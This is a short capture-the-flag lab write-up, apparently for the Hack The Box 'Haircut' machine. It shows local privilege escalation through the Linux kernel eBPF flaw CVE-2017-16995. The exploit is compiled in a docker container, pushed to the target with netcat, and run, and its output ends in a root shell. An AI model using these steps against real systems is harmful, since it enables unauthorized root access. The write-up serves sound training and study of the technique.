InfoSec LAB

Haircut_Privilege_Escalation_3

Created: 2 min read

CVE-2017-16995

a vulnerability classified as critical has been found in linux kernel up to 4.14.8 (Operating System). Affected is the function check_alu_op of the file kernel/bpf/verifier.c of the component Sign Extension. The manipulation with an unknown input leads to a memory corruption vulnerability. CWE is classifying the issue as CWE-119. The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. This is going to have an impact on confidentiality, integrity, and availability.

PEAS discovered that the target system is vulnerable to CVE-2017-16995

exploit

The exploit was found online

Due to the target system missing a few libraries, I would have to compile the exploit remotely

Docker Exploit Development

┌──(kali㉿kali)-[~/…/htb/labs/haircut/CVE-2017-5618]
└─$ docker run -it --entrypoint "/bin/bash" --name u16 ubuntu:16.04

Starting a docker container

root@27a7aa50bded:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git wget -y

Updating the repo and installing the necessary tools

root@4d5fcfb7eeab:~# nano CVE-2017-16995.c
root@4d5fcfb7eeab:~# gcc CVE-2017-16995.c -o CVE-2017-16995

Compile

root@4d5fcfb7eeab:~# nc 10.10.10.24 2222 < CVE-2017-16995
 
www-data@haircut:/dev/shm$ nc -nlvp 2222 > CVE-2017-16995
listening on [any] 2222 ...
connect to [10.10.10.24] from (UNKNOWN) [10.10.14.5] 58676
 
www-data@haircut:/dev/shm$ chmod 755 CVE-2017-16995

Delivery complete

Exploitation

www-data@haircut:/dev/shm$ ./CVE-2017-16995
./CVE-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800343ee300
[*] Leaking sock struct from ffff880076012800
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880077bc3780
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880077bc3780
[*] credentials patched, launching shell...
# whoami
whoami
root
# hostname
hostname
haircut
# ifconfig
ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:b6:6e  
          inet addr:10.10.10.24  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:b66e/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b66e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3940 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2272 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:595353 (595.3 KB)  TX bytes:394061 (394.0 KB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:168 errors:0 dropped:0 overruns:0 frame:0
          TX packets:168 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:12590 (12.5 KB)  TX bytes:12590 (12.5 KB)

System Level Compromose

Interactive Graph View

Backlinks